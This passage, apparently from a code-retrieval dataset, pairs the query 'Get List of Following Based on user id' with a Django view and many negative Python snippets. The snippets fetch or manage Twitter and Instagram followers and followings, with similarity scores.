= storage.all()[key]\n if type(arg_list[3]) != list:\n arg_list[3].replace('\"', \"\").replace(\"'\", \"\")\n setattr(obj, arg_list[2].replace('\"', \"\").replace(\"'\", \"\"),\n arg_list[3])\n obj.save()", "def run_model (arguments):\n if 
arguments.train is not None:\n # Train a new model, optionally with a certain number of epochs\n predictor = None\n if len(arguments.train) > 0:\n predictor = train(n_epochs=arguments.train[0])\n else:\n predictor = train()\n # Afterwards save it\n now = datetime.now(timezone.utc)\n predictor.to_disk(fname=f\"model_parameters_{now.strftime('%Y%m%d%H%M%S')}\")\n elif arguments.export_embeddings:\n # Load the saved predictor ...\n predictor = Predictor.from_file()\n # ... and then dump the models to disk.\n predictor.subj.export_embeddings(\"subject\")\n predictor.obj.export_embeddings(\"object\")\n print(\"Models are saved to output directory for loading with http://projector.tensorflow.org/.\")\n elif arguments.console:\n # Opens a console for prediction without training\n predictor = Predictor.from_file()\n tinker(predictor)", "def class_exec(self, cls_name, args):\n if args[:6] == '.all()':\n self.do_all(cls_name)\n elif args[:6] == '.show(':\n self.do_show(cls_name + ' ' + args[7:-2])\n elif args[:8] == \".count()\":\n all_objs = {k: v for (k, v) in storage.all().items()\n if isinstance(v, eval(cls_name))}\n print(len(all_objs))\n elif args[:9] == '.destroy(':\n self.do_destroy(cls_name + ' ' + args[10:-2])\n elif args[:8] == '.update(':\n if '{' in args and '}' in args:\n new_arg = args[8:-1].split('{')\n new_arg[1] = '{' + new_arg[1]\n else:\n new_arg = args[8:-1].split(',')\n if len(new_arg) == 3:\n new_arg = \" \".join(new_arg)\n new_arg = new_arg.replace(\"\\\"\", \"\")\n new_arg = new_arg.replace(\" \", \" \")\n self.do_update(cls_name + ' ' + new_arg)\n elif len(new_arg) == 2:\n try:\n dict = eval(new_arg[1])\n except:\n return\n for j in dict.keys():\n self.do_update(cls_name + ' ' + new_arg[0][1:-3] + ' ' +\n str(j) + ' ' + str(dict[j]))\n else:\n return\n else:\n print(\"Not a valid command\")", "def do_update(self, args):\n args = shlex.split(args)\n dicti = storage.all()\n if not args:\n print(\"** class name missing **\")\n elif not args[0] in name_of_class:\n print(\"** class doesn't exist **\")\n elif len(args) == 1:\n print(\"** instance id missing **\")\n elif not \"{}.{}\".format(args[0], args[1]) in dicti:\n print(\"** no instance found **\")\n elif len(args) == 2:\n print(\"** attribute name missing **\")\n elif len(args) == 3:\n print(\"** value missing **\")\n else:\n key = dicti[\"{}.{}\".format(args[0], args[1])]\n setattr(key, args[2], args[3])\n key.save()", "def create_model(self, **inputs):\n raise NotImplementedError('This method has to be overwritten.')", "def __init__(self, model_class, **kwargs):\n super(BulkEntryBaseTransformer, self).__init__(**kwargs)\n assert model_class\n self.model_class = model_class\n self.sync_keys = (\n self.account_manager.get_settings()['synchronize_key']\n )\n self.skip = (\n not self.sync_keys and\n self.model_class in (SshKey, Identity)\n )", "def __init__(self, **kwargs):\n\n # Identify the mode to start the model in\n if \"x\" in kwargs and \"y\" in kwargs:\n x = kwargs.get(\"x\")\n y = kwargs.get(\"y\")\n if \"model_name\" not in kwargs:\n self.__mode = \"train\"\n else:\n self.__mode = \"retrain\"\n elif \"model_name\" in kwargs:\n self.__mode = \"test\"\n else:\n raise NameError(\"Cannot infer mode from arguments.\")\n\n print(\"Initializing model in %s mode.\" % self.__mode)\n\n if self.mode == \"train\":\n # Infer input type from type(x)\n if type(x[0]) == np.bytes_:\n print(\"Input type is 'binary mols'.\")\n self.__input_type = \"mols\" # binary RDKit mols\n else:\n print(\"Input type is 'molecular 
descriptors'.\")\n self.__input_type = \"descriptors\" # other molecular descriptors\n\n # If scaling is required\n if kwargs.get(\"scaling\", False) is True:\n # Normalize the input\n print(\"Applying scaling on input.\")\n self.__scaler = StandardScaler()\n x = self.__scaler.fit_transform(x)\n else:\n self.__scaler = None\n\n # If PCA is required\n if kwargs.get(\"pca\", False) is True:\n print(\"Applying PCA on input.\")\n self.__pca = PCA(\n n_components=x.shape[1]\n ) # n_components=n_features for now\n x = self.__pca.fit_transform(x)\n else:\n self.__pca = None\n\n self.__maxlen = (\n kwargs.get(\"dataset_info\")[\"maxlen\"] + 10\n ) # Extend maxlen to avoid breaks in training\n self.__charset = kwargs.get(\"dataset_info\")[\"charset\"]\n self.__dataset_name = kwargs.get(\"dataset_info\")[\"name\"]\n self.__lstm_dim = kwargs.get(\"lstm_dim\", 256)\n self.__h_activation = kwargs.get(\"h_activation\", \"relu\")\n self.__bn = kwargs.get(\"bn\", True)\n self.__bn_momentum = kwargs.get(\"bn_momentum\", 0.9)\n self.__noise_std = kwargs.get(\"noise_std\", 0.01)\n self.__td_dense_dim = kwargs.get(\n \"td_dense_dim\", 0\n ) # >0 squeezes RNN connections with Dense sandwiches\n self.__batch_size = kwargs.get(\"batch_size\", 256)\n self.__dec_layers = kwargs.get(\"dec_layers\", 2)\n\n if self.input_type == \"descriptors\":\n self.__codelayer_dim = x.shape[1] # features\n if \"codelayer_dim\" in kwargs:\n print(\n \"Ignoring requested codelayer_dim because it is inferred from the cardinality of the descriptors.\"\n )\n else:\n self.__codelayer_dim = kwargs.get(\"codelayer_dim\", 128)\n \n # Create the left/right-padding vectorizers\n self.__smilesvec1 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n )\n\n self.__smilesvec2 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n leftpad=False,\n )\n\n # self.train_gen.next() #This line is needed to set train_gen.dims (to be fixed in HetSmilesGenerator)\n self.__input_shape = self.smilesvec1.dims\n self.__dec_dims = list(self.smilesvec1.dims)\n self.__dec_dims[0] = self.dec_dims[0] - 1\n self.__dec_input_shape = self.dec_dims\n self.__output_len = self.smilesvec1.dims[0] - 1\n self.__output_dims = self.smilesvec1.dims[-1]\n\n # Build all sub-models as untrained models\n if self.input_type == \"mols\":\n self.__build_mol_to_latent_model()\n else:\n self.__mol_to_latent_model = None\n\n self.__build_latent_to_states_model()\n self.__build_batch_model()\n\n # Build data generators\n self.__build_generators(x, y)\n\n # Retrain or Test mode\n else:\n self.__model_name = kwargs.get(\"model_name\")\n\n # Load the model\n self.__load(self.model_name)\n \n if self.mode == \"retrain\":\n # If scaling is required\n if self.scaler is not None:\n print(\"Applying scaling on input.\")\n x = self.scaler.transform(x)\n\n # If PCA is required\n if self.pca is not None:\n print(\"Applying PCA on input.\")\n x = self.pca.transform(x)\n \n # Build data generators\n self.__build_generators(x, y)\n\n # Build full model out of the sub-models\n self.__build_model()\n\n # Show the resulting full model\n print(self.model.summary())", "def __init__(self, model: Optional[Model] = None) -> None:\n self.model = model", "def __init__(self, type_name, args):\n super().__init__()\n self.type_name = type_name\n self.args = args\n self._projection = None", "def create_reid_model(name, *args, **kwargs):\r\n if name not in __factory:\r\n raise 
KeyError(\"Unknown model:\", name)\r\n return __factory[name](*args, **kwargs)", "def create_models( self ):" ]
[ "0.7021158", "0.6954336", "0.6561183", "0.6485083", "0.6346957", "0.63075995", "0.6284837", "0.6276257", "0.6271687", "0.62641424", "0.62498045", "0.6244961", "0.6220076", "0.6219613", "0.62072104", "0.61494976", "0.612144", "0.6111465", "0.60642654", "0.599565", "0.5991916", "0.59918535", "0.597002", "0.5937721", "0.5934284", "0.59213287", "0.5894491", "0.5886086", "0.58792347", "0.5876709", "0.584279", "0.584279", "0.58375645", "0.5808577", "0.5798929", "0.57961905", "0.57961905", "0.57961905", "0.57961905", "0.57957804", "0.5783583", "0.5773361", "0.5772717", "0.5772441", "0.57373214", "0.57370955", "0.57370955", "0.57370955", "0.57370955", "0.57370955", "0.5726871", "0.5722515", "0.5719627", "0.5712789", "0.57049996", "0.5695355", "0.5685483", "0.5673155", "0.566715", "0.5634266", "0.56207913", "0.5618345", "0.5618345", "0.56167054", "0.55886346", "0.5578644", "0.55775106", "0.55717415", "0.55646014", "0.5562306", "0.5547169", "0.55469555", "0.55469245", "0.5544589", "0.5540068", "0.5524754", "0.5522004", "0.5519004", "0.55066425", "0.5503253", "0.5498183", "0.54836553", "0.54804856", "0.54749566", "0.547217", "0.54688674", "0.5464028", "0.5460012", "0.54565704", "0.5453965", "0.5453364", "0.5442643", "0.54393655", "0.5432328", "0.5430151", "0.54299545", "0.5428578", "0.54270923", "0.5412916", "0.54087335" ]
0.57535255
44
Get List of Following Based on user id
def get_following_by_user(request): response, status_code = get_followings(request) if status_code != 200: return JsonResponse(response, status=status_code) serialize_data = FollowingSerializer(response, many=False).data return JsonResponse(serialize_data, status=status_code, safe=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_following(user_id):\n return list(Forward.objects.filter(source_id=user_id).values_list(\n 'destination_id', flat=True))", "def get_followings(request):\n user_id = request.GET.get(\"user_id\")\n if not user_id:\n return {\"error\": \"User Id should be provided\"}, 400\n following_data = Following.objects.filter(user_profile_id=user_id, is_active=True).first()\n return following_data, 200", "def get_followers(user_id):\n return list(Backward.objects.filter(destination_id=user_id) \\\n .values_list('source_id', flat=True))", "def getFollowings(user_id, api):\n \n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n \n _ = api.getUserFollowings(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers", "def _user_following_info(self, uid: int = 0) -> List[_InstagramUser]:\n # If no uid was specified, use the authenticated user's uid\n if uid == 0:\n uid = self.uid\n\n followings: List[Dict[str, Any]] = self.api.getTotalFollowings(uid)\n user_followings = list([_InstagramUser(x) for x in followings])\n return user_followings", "def getFollowers(self, user_id, api):\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n \n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers", "def resolve_following(self, info):\n user = info.context.user\n follow_request = FollowRequest.objects.filter(follower=user.id, pending=False)\n return [follow.following for follow in follow_request]", "def getFollowers():\n\n cur, user_id = initialise(3)\n cur.execute(\"SELECT following FROM followers WHERE user = (SELECT username FROM users WHERE id = ?)\", [user_id])\n tempFollowers = cur.fetchall()\n followers = []\n for follower in tempFollowers:\n followers.append(follower[0])\n return followers", "def get_user_following(self, user_id, count = 30, page = 1):\n uri = 'users/' + user_id + '/following'\n options = { 'per_page': cont, 'page': page }\n return self.make_request(uri, options)", "def show_following(user_id):\n\n\n user = User.query.get_or_404(user_id)\n return render_template('users/following.html', user=user)", "def by_follower_id(cls, follower_id, request):\n\t\treturn request.dbsession.query(Follow).filter_by(follower_id=follower_id).all()", "def _get_followed(_user_id, _ignore_exceptions=False, _start_index=0, _count=100):\n _following_url = f\"{base_url}/people/{_user_id}/@following?count={_count}\" + \\\n f\"&startIndex={_start_index}\"\n _response = core.get_request_with_retries(_following_url)\n if _response.status_code == 200:\n _following_data = _response.json()\n else:\n if _ignore_exceptions:\n _empty_response = {\"list\": []}\n _following_data = core_utils.convert_dict_to_json(_empty_response)\n else:\n if _response.status_code == 404:\n raise errors.exceptions.UserNotFoundError()\n else:\n raise errors.exceptions.UserQueryError()\n return _following_data", "def select_user_following(args):\n is_parameter_exists([\n constants.ID\n ], args)\n\n # Request User\n request_user = args[constants.USER]\n\n # Requested User ID\n requested_user_id = args[constants.ID]\n\n # Page Number\n page_number = 1 if constants.PAGE_NUMBER not in args else int(args[constants.PAGE_NUMBER])\n\n # Check User Id\n if not 
User.objects.filter(id=requested_user_id).exists():\n raise ApiError(constants.NOT_EXIST_OBJECT)\n\n # Following QuerySet\n queryset = UserFollow.objects.filter(following_user=requested_user_id).values_list('followed_user', flat=True)\n\n # User Ids\n user_ids = get_results_from_queryset(queryset, 10, page_number)\n\n # is_finished\n is_finished = not user_ids.has_next()\n\n # Filter Query\n filter_query = Q(id__in=user_ids)\n\n # Users\n users, _, _ = __get_users(filter_query, request_user, 10)\n\n return users, page_number, is_finished", "def get_follows(self):\n return [c.id for c in self.conf.follows]", "def user_following_v1(self, user_id: int, amount: int = 0) -> list:\n user_id = int(user_id)\n max_id = \"\"\n users = []\n while True:\n result = self.private_request(\n f\"friendships/{user_id}/following/\",\n params={\n \"max_id\": max_id,\n \"rank_token\": self.rank_token,\n \"ig_sig_key_version\": config.SIG_KEY_VERSION,\n },\n )\n for user in result[\"users\"]:\n users.append(extract_user_short(user))\n max_id = result.get(\"next_max_id\")\n if not max_id or (amount and len(users) >= amount):\n break\n if amount:\n users = users[:amount]\n return users", "def user_following_gql(self, user_id: int, amount: int = 0) -> list:\n user_id = int(user_id)\n end_cursor = None\n users = []\n variables = {\n \"id\": user_id,\n \"include_reel\": True,\n \"fetch_mutual\": False,\n \"first\": 24\n }\n while True:\n if end_cursor:\n variables[\"after\"] = end_cursor\n data = self.public_graphql_request(\n variables, query_hash=\"e7e2f4da4b02303f74f0841279e52d76\"\n )\n if not data[\"user\"] and not users:\n raise UserNotFound(user_id=user_id, **data)\n page_info = json_value(\n data, \"user\", \"edge_follow\", \"page_info\", default={}\n )\n edges = json_value(\n data, \"user\", \"edge_follow\", \"edges\", default=[]\n )\n for edge in edges:\n users.append(extract_user_short(edge[\"node\"]))\n end_cursor = page_info.get(\"end_cursor\")\n if not page_info.get(\"has_next_page\") or not end_cursor:\n break\n if amount and len(users) >= amount:\n break\n # time.sleep(sleep)\n if amount:\n users = users[:amount]\n return users", "def show_following(user_id):\n\n if not g.user:\n flash(\"Access unauthorized.\", \"danger\")\n return redirect(\"/\")\n\n user = User.query.get_or_404(user_id)\n users_blocking = [block.user_blocking_id for block in Blocks.query.all() if block.user_being_blocked_id == g.user.id]\n likes = [message for message in user.likes if message.user_id not in users_blocking]\n return render_template('users/following.html', user=user, likes=likes)", "def by_followee_id(cls, followee_id, request):\n\t\treturn request.dbsession.query(Follow).filter_by(followee_id=followee_id).all()", "def get_queryset(self, *args, **kwargs):\n following_username = self.kwargs.get(self.look_url_kwarg)\n following_users = FollowUser.objects.filter(\n following_username=following_username)\n\n return following_users", "def get(self, request, format=None):\n queryset = request.user.following.all()\n paginated = self.paginate_queryset(queryset)\n return self.get_paginated_response(UserProfileSerializer(paginated, many=True).data)", "def add_following(self, user_id):\n sleep(360) # too much follows => function ban\n self.following.append(user_id)\n return perform_with_ran_delay(self.instagram.follow, user_id)", "def resolve_followers(self, info):\n user = info.context.user\n follow_request = FollowRequest.objects.filter(following=user.id, pending=False)\n return [follow.follower for follow in 
follow_request]", "def get_follows_route(request):\n\n db_conn = request['db_conn']\n current_user = get_current_user(request)\n user_id = request['params'].get('user_id')\n if user_id:\n user = get_user({'id': user_id}, db_conn)\n if not user:\n return abort(404)\n if (user != current_user and\n user['settings']['view_follows'] != 'public'):\n return abort(403)\n else:\n user = current_user\n if not user:\n return abort(401)\n params = dict(**request['params'])\n params['user_id'] = user['id']\n follows = list_follows(params, db_conn)\n return 200, {\n 'follows': [deliver_follow(follow, access='private')\n for follow in follows]\n }", "async def get_new_followers(self, bearer_token:str, user_id:str, after:str) -> list:\n\n headers = {\"Client-Id\": self.TWITCH_PARAMS['client_id'], \"Authorization\": f\"Bearer {bearer_token}\"}\n params = {\"to_id\": user_id, \"first\": 100}\n if after:\n params[\"after\"] = after\n output = []\n while True:\n async with self.bot.session.get(self.TWITCH_USER_FOLLOWS_URL, params=params, headers=headers) as r:\n data = await r.json()\n # self.logger.info(data)\n output.extend(data.get('data', list()))\n if len(data.get('data', list())) < 100:\n break\n params['after'] = data.get('pagination', {}).get('cursor', None)\n return output, data.get('pagination', {}).get('cursor', None)", "def getTotalFollowers(api, user_id):\n\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers", "def getTotalFollowers(api, user_id):\n\n followers_ = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers_.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers_", "def user_following(username, max: int = None):\n for user_dict in client.user_relationships(username, max=max, type=\"following\"):\n print(json.dumps(user_dict))", "def followed_by(self, user_id):\n\n url = \"https://api.instagram.com/v1/users/{0}/followed-by?access_token={1}\".format(user_id, self.access_token)\n\n request = requests.get(url)\n return request.json()", "def get_queryset(self):\n user: User = self.request.user\n following_users = user.profile.following.all()\n return Post.objects.filter(author__in=following_users).order_by('created')", "def user_follow():\n data = request.get_json(force=True)\n follower = User.query.get(data['follower'])\n following = User.query.get(data['following'])\n follower.followcheck.append(following)\n db.session.commit()\n return {'followed': True}", "def _user_follower_info(self, uid: int = 0) -> List[_InstagramUser]:\n # If no uid was specified, use the authenticated user's uid\n if uid == 0:\n uid = self.uid\n\n followers: List[Dict[str, Any]] = self.api.getTotalFollowers(uid)\n user_followers = list([_InstagramUser(x) for x in followers])\n return user_followers", "def follow_user(cls, user, following):\r\n pass", "def getFollowings(self,id=None,**kwargs):\n # GET /followings [/$id]\n debugMain('getEntitiesIFollow')\n if id is None:\n return self._genericGet('/followings',**kwargs)\n else:\n return self._genericGet('/followings/%s'%id,**kwargs)", "def users_followers(user_id):\n\n if not g.user:\n flash(\"Access unauthorized.\", \"danger\")\n 
return redirect(\"/\")\n\n user = User.query.get_or_404(user_id)\n users_blocking = [block.user_blocking_id for block in Blocks.query.all() if block.user_being_blocked_id == g.user.id]\n likes = [message for message in user.likes if message.user_id not in users_blocking]\n return render_template('users/followers.html', user=user, likes=likes)", "def follow(request, usertofollow):\n to_follow = Member.objects.get(user__username=usertofollow)\n user = Member.objects.get(user=request.user)\n user.following.add(to_follow)\n user.save()\n return redirect(request.META['HTTP_REFERER'])", "def get_friends(user_id):\n return list(set(get_following(user_id)) &\n set(get_followers(user_id)))", "def add_follow(follow_id):\n\n want_to_follow_user = User.query.get_or_404(follow_id)\n if want_to_follow_user.private:\n # =========== NEED TO IMPLEMENT ====================\n # send them a request to follow\n want_to_follow_user.from_users.append(g.user) \n db.session.commit()\n flash(\"Your request has been sent\", \"success\")\n return redirect(f\"/users/{g.user.id}/following\")\n\n g.user.following.append(want_to_follow_user)\n db.session.commit()\n\n return redirect(f\"/users/{g.user.id}/following\")", "def feeds(self):\n return Order.objects.filter(customer__in=self.following.all())", "def follows(self, user_id):\n\n url = \"https://api.instagram.com/v1/users/{0}/follows?access_token={1}\".format(user_id, self.access_token)\n\n request = requests.get(url)\n return request.json()", "def follow_user(cls, user, following):\n pass", "def get_followers(user):\n if user.has_key('followers_list'):\n pass\n else:\n if user.has_key('followers_count'):\n if user['followers_count'] > 4999:\n pages = user['followers_count'] / 5000\n f_list = []\n for page in range(pages):\n try:\n follower_set = api.GetFollowers(user_id=user['id'], cursor=page, count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n f_list = friends_list + f_list\n time.sleep(60)\n user['followers_list'] = f_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(f_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)\n else:\n try:\n follower_set = api.GetFollowers(user_id=user['id'], count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n user['followers_list'] = friends_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(friends_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)", "def is_user_following(self, user_id):\n return user_id in self.following", "def follows(self):\r\n return relationships.Follows(self)", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def followers(self):\r\n url = '{0}/followers'.format(self.get_url())\r\n return http.Request('GET', url), parsers.parse_json", "def follow(self, followerId: int, followeeId: int) -> None:\n if followeeId not in 
self.followList.get(followerId, [followerId]):\n self.followList[followerId] = self.followList.get(followerId, [followerId]) + [followeeId]\n # print(self.followList)", "def auto_follow_followers():\n\n following = set(t.friends.ids(screen_name=TWITTER_HANDLE)[\"ids\"])\n followers = set(t.followers.ids(screen_name=TWITTER_HANDLE)[\"ids\"])\n\n not_following_back = followers - following\n\n for user_id in not_following_back:\n try:\n t.friendships.create(user_id=user_id, follow=False)\n except Exception as e:\n print(\"error: %s\" % (str(e)))", "def getFollowers(self,id=None,**kwargs):\n # GET /followers [/$id]\n debugMain('getFollowers')\n if id is None:\n return self._genericGet('/followers',**kwargs)\n else:\n return self._genericGet('/followers/%s'%id,**kwargs)", "def user_playlist_is_following(self, playlist_id, user_ids, **kwargs):\n return self._get(\n API.PLAYLIST_FOLLOWERS_CONTAINS.value.format( # pylint: disable=no-member\n playlist_id=playlist_id\n ),\n ids=\",\".join(user_ids),\n **kwargs,\n )", "def users_being_followed_tweets():\n username = request.authorization.username\n tweets = []\n\n user_id = get_user_id(username);\n tuples = query_db('''\n select message.*, user.* from message, user\n where message.author_id = user.user_id and (\n user.user_id = ? or\n user.user_id in (select whom_id from follower\n where who_id = ?))\n order by message.pub_date desc limit ?''',\n [user_id, user_id, PER_PAGE])\n\n for tuple in tuples:\n tweet = {}\n tweet[\"message_id\"] = tuple['message_id']\n tweet[\"author_id\"] = tuple['author_id']\n tweet[\"text\"] = tuple['text']\n tweet[\"pub_date\"] = tuple['pub_date']\n tweet[\"username\"] = tuple['username']\n tweet[\"email\"] = tuple['email']\n tweets.append(tweet)\n\n return jsonify({'tweets': tweets}), 200", "def users_followers(user_id):\n\n user = User.query.get_or_404(user_id)\n return render_template('users/followers.html', user=user)", "def getFollowers():\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n\n _ = GetInstagramAnswer.igApi.getUserFollowers(GetInstagramAnswer.igApi.username_id, maxid=next_max_id)\n followers.extend(GetInstagramAnswer.igApi.LastJson.get('users',[]))\n next_max_id = GetInstagramAnswer.igApi.LastJson.get('next_max_id','')\n return \"You have currently \"+str(len(followers))+\" Followers on Instagram.\"", "def test_get_list_of_following_users_without_auth(self):\n self.authorize_user(self.user)\n with self.settings(\n EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend'):\n self.register_user(self.user1)\n response = self.client.get(self.following_list_url)\n self.assertEqual(response.content,\n b'{\"following\": []}')\n self.assertEqual(response.status_code, status.HTTP_200_OK)", "def follows(self):\n return relationships.Follows(self)", "def followers(self):\r\n request = http.Request('GET', '{0}/followers/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def followers(self):\r\n request = http.Request('GET', '{0}/followers/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def followers(self):\r\n request = http.Request('GET', '{0}/followers/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def followers(self):\n return self.data.get(\"followers\")", "def getUserFollowers(user):\n sleep(5)\n first = user+\"communaute/\"\n driver.get(first)\n sleep(5)\n followers = set()\n followers_page = []\n div_links = []\n\n nb_follower_div = 
driver.find_element_by_xpath(\"//div[@class='inner-nav-item current ']\").is_displayed()\n if nb_follower_div:\n nb_follower_text = driver.find_element_by_xpath(\"//div[@class='inner-nav-item current ']\").text\n nb_follower = nb_follower_text.split(\"(\",2)[1].split(\")\",2)[0]\n nb_follower = int(nb_follower)\n print(\"NB Followers : \",nb_follower)\n\n pagination = driver.find_elements_by_xpath(\"//a[@class='xXx button button-md item']\")\n page_links = [elem.get_attribute('href') for elem in pagination]\n page_links.insert(0,first)\n\n if nb_follower > 0:\n for num in page_links:\n if page_links.index(num) > 0:\n driver.get(num)\n sleep(5)\n div_links = driver.find_elements_by_xpath(\"//a[@class='xXx']\")\n followers_page = [elem.get_attribute('href') for elem in div_links]\n for link in followers_page:\n if link_patterns in link:\n followers.add(link)\n return followers", "def list(self, user_ids: Optional[List[UserId]]) -> List[U]:\n ...", "def get_people_followed(user_id, ignore_exceptions=False, return_type=list, start_index=0):\n def _get_followed(_user_id, _ignore_exceptions=False, _start_index=0, _count=100):\n \"\"\"This function performs the API call to get the users followed from a single GET request.\n\n .. versionchanged:: 3.1.0\n Renamed the function to only have a single underscore prefix and added parenthesis to the exception\n classes.\n\n :param _user_id: The User ID for the user against which to check\n :type _user_id: int\n :param _ignore_exceptions: Determines whether non-200 responses should raise an exception (Default: ``False``)\n :type _ignore_exceptions: bool\n :param _start_index: The startIndex for the API call (Default: ``0``)\n :type _start_index: int\n :param _count: The maximum number of results to return in the API call (Default: ``100``)\n :type _count: int\n :returns: The data from the @following sub-endpoint in JSON format\n :raises: :py:exc:`khorosjx.errors.exceptions.UserQueryError`,\n :py:exc:`khorosjx.errors.exceptions.UserNotFoundError`,\n \"\"\"\n _following_url = f\"{base_url}/people/{_user_id}/@following?count={_count}\" + \\\n f\"&startIndex={_start_index}\"\n _response = core.get_request_with_retries(_following_url)\n if _response.status_code == 200:\n _following_data = _response.json()\n else:\n if _ignore_exceptions:\n _empty_response = {\"list\": []}\n _following_data = core_utils.convert_dict_to_json(_empty_response)\n else:\n if _response.status_code == 404:\n raise errors.exceptions.UserNotFoundError()\n else:\n raise errors.exceptions.UserQueryError()\n return _following_data\n\n # Verify that the core connection has been established\n verify_core_connection()\n\n # Perform the initial API call\n people_followed = []\n following_data = _get_followed(user_id, ignore_exceptions)\n\n # Continue looping through the data from subsequent calls until an empty list is found in the JSON response\n while following_data.get('list'):\n for user_followed in following_data.get('list'):\n # Append reach User ID to the list\n people_followed.append(user_followed.get('id'))\n\n # Perform the next API call for the next 100 users\n start_index += 100\n following_data = _get_followed(user_id, ignore_exceptions, start_index)\n\n # Convert the list to a comma-separated string and return the value\n if return_type == str:\n people_followed = ','.join(people_followed)\n elif return_type == tuple:\n people_followed = tuple(people_followed)\n return people_followed", "def user_follow_users(self, ids=None, **kwargs):\n return self._put(\n 
API.MY_FOLLOWING.value, type=\"user\", ids=\",\".join(ids or []), **kwargs\n )", "def get_mavens(user_id):\n following = get_following(user_id)\n return list(User.objects.exclude(pk__in=(following + [user_id])) \\\n .order_by('-userstatistics__karma') \\\n .values_list('id', flat=True))", "def all_followers(twitter_dict, twitter_name): \r\n \r\n following_list = []\r\n for user in twitter_dict:\r\n f_list = twitter_dict[user]['following']\r\n if twitter_name in f_list:\r\n following_list.append(user) \r\n return following_list", "def get_following(self, from_mongo=True, from_file=False):\n\n all_following = dict()\n following = list()\n\n #Get the data from Mongo\n if from_mongo:\n following = self._users_collection.find({'am_following': True})\n\n #Get the live data\n elif not from_mongo and not from_file:\n following = self.getTotalSelfFollowers()\n json.dump(following, open('all_following.json', 'w'), indent=4)\n\n #Get the data from a saved file\n else:\n saved_following = json.load(open('all_following.json', 'r'))\n\n for saved_following in following:\n saved_following['am_following'] = True\n all_following[saved_following['pk']] = saved_following\n\n return all_following", "def follow_following_followers(self):\n self.logger.log(\"starting follow_following_followers...\")\n follows_accounts = self.following\n random.shuffle(follows_accounts)\n for acc in follows_accounts:\n try:\n try:\n followw = perform_with_ran_delay(self.instagram.get_followers, acc, 150, 15,\n delayed=True)\n accountstofollow = followw[\"accounts\"]\n random.shuffle(accountstofollow)\n if len(accountstofollow) > 10:\n accountstofollow = accountstofollow[:10]\n for ac in accountstofollow:\n if not self.is_user_following(ac.identifier):\n self.add_following(ac.identifier)\n self.logger.log(\"following: {}\".format(ac.username))\n except Exception as e:\n print(e)\n self.logger.log(str(e))\n finally:\n sleep(3)", "def follow_closely(api_, follow_username):\n big_list = True\n max_id = ''\n following = []\n\n while big_list:\n api_.getSelfUsersFollowing(maxid=max_id)\n followers_ = api_.LastJson\n for f in followers_['users']:\n following.append(f)\n big_list = followers_['big_list']\n if not big_list:\n break\n # this key only exists if there is more pages\n max_id = followers_['next_max_id']\n\n for f in following:\n if f['username'] == follow_username:\n return True, f", "def follow(self, followerId: int, followeeId: int) -> None:\n self.user_followed[followerId].append(followeeId)", "def following(request):\n user = request.user\n posts = Post.objects.filter(\n author__in=user.following.all()).order_by('-timestamp')\n\n paginator = Paginator(posts, 10)\n\n page_number = request.GET.get('page')\n page_object = paginator.get_page(page_number)\n\n return render(request, \"network/following.html\", {\"posts\": page_object})", "def is_following_by_username(self, id):\n return self.followed.filter(followers.c.followed_id == id).count() > 0", "def follows_target_check(twitter,top_followers_list):\n yes_follow_list = []\n not_follow_list = []\n following_dict = {}\n target = 'HillaryClinton'\n \n for user in top_followers_list:\n params = {'source_id':user, 'target_screen_name':target}\n response = twitter.request('friendships/show', params)\n data = response.json()\n #print(\"DATAAA::\",data)\n if response.status_code == 200:\n #print(\"IN BIGG IFFFFF:::\")\n following_dict = data['relationship']['source']\n #print(\"following_dict::\",following_dict)\n check = following_dict['following']\n #print(\"check::\",check)\n 
